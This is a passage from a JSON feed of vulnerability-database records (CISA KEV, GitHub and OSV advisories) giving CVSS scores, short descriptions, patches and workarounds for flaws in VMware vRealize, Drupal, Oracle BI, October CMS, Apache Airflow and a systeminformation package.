"baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-01-18T00:00:00", "type": "cisa_kev", "title": "VMware Server Side Request Forgery in vRealize Operations Manager API", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975"], "modified": "2022-01-18T00:00:00", "id": 
"CISA-KEV-CVE-2021-21975", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-06-05T15:37:18", "description": "Improper sanitization in the extension file names is present in Drupal core.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-18T00:00:00", "type": "cisa_kev", "title": "Drupal core Un-restricted Upload of File", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-13671"], "modified": "2022-01-18T00:00:00", "id": "CISA-KEV-CVE-2020-13671", "href": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-06-05T15:37:18", "description": "Path traversal vulnerability, where an attacker can target the preview FilePath parameter of the getPreviewImage function to get access to arbitrary system file.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-01-18T00:00:00", "type": "cisa_kev", "title": "Oracle Business Intelligence Enterprise Edition Path Transversal", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14864"], "modified": "2022-01-18T00:00:00", "id": "CISA-KEV-CVE-2020-14864", "href": "", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}}], "github": [{"lastseen": "2023-05-27T15:15:44", "description": "### Impact\n\nAn attacker can request an account password reset and then gain access to the account using a specially crafted request.\n\n- To exploit this vulnerability, an attacker must know the username of an administrator and have access to the password reset form.\n\n### Patches\n\n- Issue has been patched in Build 472 and v1.1.5\n- [Shortened patch instructions](https://github.com/daftspunk/CVE-2021-32648)\n\n### Workarounds\n\nApply https://github.com/octobercms/library/commit/016a297b1bec55d2e53bc889458ed2cb5c3e9374 and https://github.com/octobercms/library/commit/5bd1a28140b825baebe6becd4f7562299d3de3b9 to your installation manually if you are unable to upgrade.\n\n[**Update 2022-01-20**] [Shortened patch instructions](https://github.com/daftspunk/CVE-2021-32648) can be found here.\n\n### Recommendations\n\nWe recommend the following steps to make sure your server stays secure:\n\n- Keep server OS and system software up to date.\n- Keep October CMS software up to 
date.\n- Use a multi-factor authentication plugin.\n- Change the [default backend URL](https://github.com/octobercms/october/blob/1.1/config/cms.php#L39) or block public access to the backend area.\n- Include the [Roave/SecurityAdvisories](https://github.com/Roave/SecurityAdvisories) Composer package to ensure that your application doesn't have installed dependencies with known security vulnerabilities.\n\n### References\n\nBugs found as part of Solar Security CMS Research. Credits to:\n\u2022 Andrey Basarygin\n\u2022 Andrey Guzei\n\u2022 Mikhail Khramenkov\n\u2022 Alexander Sidukov\n\u2022 Maxim Teplykh\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Email us at [hello@octobercms.com](mailto:hello@octobercms.com)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2021-08-30T16:13:02", "type": "github", "title": "Account Takeover in Octobercms", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-32648"], "modified": "2023-01-27T05:00:52", "id": "GHSA-MXR5-MC97-63RC", "href": "https://github.com/advisories/GHSA-mxr5-mc97-63rc", "cvss": {"score": 6.4, 
"vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2023-06-05T14:39:40", "description": "An issue was found in Apache Airflow versions 1.10.10 and below. A remote code/command injection vulnerability was discovered in one of the example DAGs shipped with Airflow which would allow any authenticated user to run arbitrary commands as the user running airflow worker/scheduler (depending on the executor in use). If you already have examples disabled by setting load_examples=False in the config then you are not vulnerable.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-27T16:57:33", "type": "github", "title": "Remote code execution in Apache Airflow", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11978"], "modified": "2023-02-01T05:04:21", "id": "GHSA-RVMQ-4X66-Q7J3", "href": "https://github.com/advisories/GHSA-rvmq-4x66-q7j3", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T15:16:04", "description": "### Impact\ncommand injection vulnerability\n\n### Patches\nProblem was fixed with a parameter check. 
Please upgrade to version >= 5.3.1\n\n### Workarounds\nIf you cannot upgrade, be sure to check or sanitize service parameters that are passed to si.inetLatency(), si.inetChecksite(), si.services(), si.processLoad() ... do only allow strings, reject any arrays. String sanitation works as expected.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-16T16:51:04", "type": "github", "title": "Command Injection Vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21315"], "modified": "2023-02-01T05:05:06", "id": "GHSA-2M8V-572M-FF2V", "href": "https://github.com/advisories/GHSA-2m8v-572m-ff2v", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-05T17:18:41", "description": "\"The previous default setting for Airflow's Experimental API was to allow all API requests without authentication, but this poses security risks to users who miss this fact. From Airflow 1.10.11 the default has been changed to deny all requests by default and is documented at https://airflow.apache.org/docs/1.10.11/security.html#api-authentication. 
Note this change fixes it for new installs but existing users need to change their config to default `[api]auth_backend = airflow.api.auth.backend.deny_all` as mentioned in the Updating Guide: https://github.com/apache/airflow/blob/1.10.11/UPDATING.md#experimental-api-will-deny-all-request-by-default\"", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-30T17:34:13", "type": "github", "title": "Authentication bypass in Apache Airflow", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-13927"], "modified": "2023-02-01T05:05:37", "id": "GHSA-HHX9-P69V-CX2J", "href": "https://github.com/advisories/GHSA-hhx9-p69v-cx2j", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-05T17:18:21", "description": "Drupal core does not properly sanitize certain filenames on uploaded files, which can lead to files being interpreted as the incorrect extension and served as the wrong MIME type or executed as PHP for certain hosting configurations. 
This issue affects: Drupal Drupal Core 9.0 versions prior to 9.0.8, 8.9 versions prior to 8.9.9, 8.8 versions prior to 8.8.11, and 7 versions prior to 7.74.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-12T16:28:25", "type": "github", "title": "Unrestricted Upload of File with Dangerous Type in Drupal core.", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-13671"], "modified": "2023-02-01T05:06:28", "id": "GHSA-68JC-V27H-VHMW", "href": "https://github.com/advisories/GHSA-68jc-v27h-vhmw", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T15:15:44", "description": "### Impact\n\nAn attacker can exploit this vulnerability to bypass authentication using a specially crafted persist cookie.\n\n- To exploit this vulnerability, an attacker must obtain a Laravel\u2019s secret key for cookie encryption and signing.\n- Due to the logic of how this mechanism works, a targeted user account must be logged in while\nthe attacker is exploiting the vulnerability.\n- Authorization via persist cookie not shown in access logs.\n\n### Patches\n\n- Issue has been 
patched in Build 472 and v1.1.5\n- [Shortened patch instructions](https://github.com/daftspunk/CVE-2021-32648)\n\n### Workarounds\n\nApply https://github.com/octobercms/library/commit/016a297b1bec55d2e53bc889458ed2cb5c3e9374 and https://github.com/octobercms/library/commit/5bd1a28140b825baebe6becd4f7562299d3de3b9 to your installation manually if you are unable to upgrade.\n\n[**Update 2022-01-20**] [Shortened patch instructions](https://github.com/daftspunk/CVE-2021-32648) can be found here.\n\n### Recommendations\n\nWe recommend the following steps to make sure your server stays secure:\n\n- Keep server OS and system software up to date.\n- Keep October CMS software up to date.\n- Use a multi-factor authentication plugin.\n- Change the [default backend URL](https://github.com/octobercms/october/blob/1.1/config/cms.php#L39) or block public access to the backend area.\n- Include the [Roave/SecurityAdvisories](https://github.com/Roave/SecurityAdvisories) Composer package to ensure that your application doesn't have installed dependencies with known security vulnerabilities.\n\n### References\n\nBugs found as part of Solar Security CMS Research. 
Credits to:\n\u2022 Andrey Basarygin\n\u2022 Andrey Guzei\n\u2022 Mikhail Khramenkov\n\u2022 Alexander Sidukov\n\u2022 Maxim Teplykh\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Email us at [hello@octobercms.com](mailto:hello@octobercms.com)\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.4, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2021-08-30T16:13:50", "type": "github", "title": "October CMS auth bypass and account takeover", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-29487", "CVE-2021-32648"], "modified": "2023-01-29T05:02:32", "id": "GHSA-H76R-VGF3-J6W5", "href": "https://github.com/advisories/GHSA-h76r-vgf3-j6w5", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}}], "osv": [{"lastseen": "2023-03-28T05:37:30", "description": "### Impact\n\nAn attacker can request an account password reset and then gain access to the account using a specially crafted request.\n\n- To exploit this vulnerability, an attacker must know the username of an administrator and have access to the password reset form.\n\n### Patches\n\n- Issue has been patched in Build 472 and v1.1.5\n- 
[Shortened patch instructions](https://github.com/daftspunk/CVE-2021-32648)\n\n### Workarounds\n\nApply https://github.com/octobercms/library/commit/016a297b1bec55d2e53bc889458ed2cb5c3e9374 and https://github.com/octobercms/library/commit/5bd1a28140b825baebe6becd4f7562299d3de3b9 to your installation manually if you are unable to upgrade.\n\n[**Update 2022-01-20**] [Shortened patch instructions](https://github.com/daftspunk/CVE-2021-32648) can be found here.\n\n### Recommendations\n\nWe recommend the following steps to make sure your server stays secure:\n\n- Keep server OS and system software up to date.\n- Keep October CMS software up to date.\n- Use a multi-factor authentication plugin.\n- Change the [default backend URL](https://github.com/octobercms/october/blob/1.1/config/cms.php#L39) or block public access to the backend area.\n- Include the [Roave/SecurityAdvisories](https://github.com/Roave/SecurityAdvisories) Composer package to ensure that your application doesn't have installed dependencies with known security vulnerabilities.\n\n### References\n\nBugs found as part of Solar Security CMS Research. 
Credits to:\n\u2022 Andrey Basarygin\n\u2022 Andrey Guzei\n\u2022 Mikhail Khramenkov\n\u2022 Alexander Sidukov\n\u2022 Maxim Teplykh\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Email us at [hello@octobercms.com](mailto:hello@octobercms.com)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2021-08-30T16:13:02", "type": "osv", "title": "Account Takeover in Octobercms", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-32648"], "modified": "2023-03-28T05:37:23", "id": "OSV:GHSA-MXR5-MC97-63RC", "href": "https://osv.dev/vulnerability/GHSA-mxr5-mc97-63rc", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2022-05-12T01:31:57", "description": "An issue was found in Apache Airflow versions 1.10.10 and below. A remote code/command injection vulnerability was discovered in one of the example DAGs shipped with Airflow which would allow any authenticated user to run arbitrary commands as the user running airflow worker/scheduler (depending on the executor in use). 
If you already have examples disabled by setting load_examples=False in the config then you are not vulnerable.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-07-17T00:15:00", "type": "osv", "title": "PYSEC-2020-14", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11978"], "modified": "2020-07-22T17:15:00", "id": "OSV:PYSEC-2020-14", "href": "https://osv.dev/vulnerability/PYSEC-2020-14", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-04-11T01:50:01", "description": "An issue was found in Apache Airflow versions 1.10.10 and below. A remote code/command injection vulnerability was discovered in one of the example DAGs shipped with Airflow which would allow any authenticated user to run arbitrary commands as the user running airflow worker/scheduler (depending on the executor in use). 
If you already have examples disabled by setting load_examples=False in the config then you are not vulnerable.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-27T16:57:33", "type": "osv", "title": "Remote code execution in Apache Airflow", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11978"], "modified": "2023-04-11T01:49:54", "id": "OSV:GHSA-RVMQ-4X66-Q7J3", "href": "https://osv.dev/vulnerability/GHSA-rvmq-4x66-q7j3", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-05-12T01:20:57", "description": "### Impact\ncommand injection vulnerability\n\n### Patches\nProblem was fixed with a parameter check. Please upgrade to version >= 5.3.1\n\n### Workarounds\nIf you cannot upgrade, be sure to check or sanitize service parameters that are passed to si.inetLatency(), si.inetChecksite(), si.services(), si.processLoad() ... do only allow strings, reject any arrays. 
String sanitation works as expected.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-16T16:51:04", "type": "osv", "title": "Command Injection Vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21315"], "modified": "2021-02-16T16:50:49", "id": "OSV:GHSA-2M8V-572M-FF2V", "href": "https://osv.dev/vulnerability/GHSA-2m8v-572m-ff2v", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-04-11T01:32:35", "description": "\"The previous default setting for Airflow's Experimental API was to allow all API requests without authentication, but this poses security risks to users who miss this fact. From Airflow 1.10.11 the default has been changed to deny all requests by default and is documented at https://airflow.apache.org/docs/1.10.11/security.html#api-authentication. 
Note this change fixes it for new installs but existing users need to change their config to default `[api]auth_backend = airflow.api.auth.backend.deny_all` as mentioned in the Updating Guide: https://github.com/apache/airflow/blob/1.10.11/UPDATING.md#experimental-api-will-deny-all-request-by-default\"", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-30T17:34:13", "type": "osv", "title": "Authentication bypass in Apache Airflow", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-13927"], "modified": "2023-04-11T01:32:09", "id": "OSV:GHSA-HHX9-P69V-CX2J", "href": "https://osv.dev/vulnerability/GHSA-hhx9-p69v-cx2j", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-12T01:24:43", "description": "The previous default setting for Airflow's Experimental API was to allow all API requests without authentication, but this poses security risks to users who miss this fact. From Airflow 1.10.11 the default has been changed to deny all requests by default and is documented at https://airflow.apache.org/docs/1.10.11/security.html#api-authentication. 
Note this change fixes it for new installs but existing users need to change their config to default `[api]auth_backend = airflow.api.auth.backend.deny_all` as mentioned in the Updating Guide: https://github.com/apache/airflow/blob/1.10.11/UPDATING.md#experimental-api-will-deny-all-request-by-default", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-11-10T16:15:00", "type": "osv", "title": "PYSEC-2020-18", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-13927"], "modified": "2020-11-24T17:29:00", "id": "OSV:PYSEC-2020-18", "href": "https://osv.dev/vulnerability/PYSEC-2020-18", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-04-11T01:41:25", "description": "Drupal core does not properly sanitize certain filenames on uploaded files, which can lead to files being interpreted as the incorrect extension and served as the wrong MIME type or executed as PHP for certain hosting configurations. 
